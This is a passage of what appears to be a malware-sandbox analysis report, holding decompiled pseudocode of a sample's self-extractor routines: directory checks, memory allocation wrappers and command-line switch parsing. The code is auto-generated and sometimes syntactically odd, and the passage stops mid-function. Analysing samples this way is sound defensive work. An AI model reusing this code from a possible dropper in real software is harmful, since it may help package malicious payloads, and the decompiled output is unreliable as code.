                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BEF042321043509BD331451D9884BA6BFDD9B96150F59019EF9DAC320DCA674D8587A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D621E() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            					0x4f0 = 2;
                                                                                                                                                                                                                                            					_t9 = E010D597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E010D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            					_t9 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010D623F
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4B60(signed int _a4) {
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t15 + 0x10d8d64)) != 1) {
                                                                                                                                                                                                                                            					_t9 = FindCloseChangeNotification( *(_t15 + 0x10d8d74)); // executed
                                                                                                                                                                                                                                            					if(_t9 == 0) {
                                                                                                                                                                                                                                            						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d60)) = 1;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d68)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d70)) = 0;
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t15 + 0x10d8d6c)) = 0;
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010D4FA1,00000000), ref: 010D4B98
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D66AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,010D4777,?,010D4E38,?), ref: 010D66B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x010d4caa
                                                                                                                                                                                                                                            0x010d4cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 010D4CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x010d4cc8
                                                                                                                                                                                                                                            0x010d4ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E010D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x10d8004; // 0xc2f4ed82
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E010D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E010D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x10d8004; // 0xc2f4ed82
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E010D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E010D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E010D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E010D44B9(0, 0x521, 0x10d1140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0x10d8588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E010D667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E010D667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E010D5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E010D1680(0x10d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E010D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E010D667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x10d8a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E010D5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x10d8b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x10d8a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E010D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E010D658A(_t218, 0x104, 0x10d1140);
                                                                                                                                                                                                                                            																if(E010D31E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x10d8a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x10d8a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x10d8a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x10d8a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x10d8a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x10d9a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x10d9a2c =  *0x10d9a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x10d8d48 =  *0x10d8d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x10d9a2c =  *0x10d9a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x10d9a2c =  *0x10d9a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x10d8d48 =  *0x10d8d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x10d9a2c =  *0x10d9a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x10d8a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x10d9a2c = 3;
                                                                                                                                                                                                                                            																	 *0x10d8a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
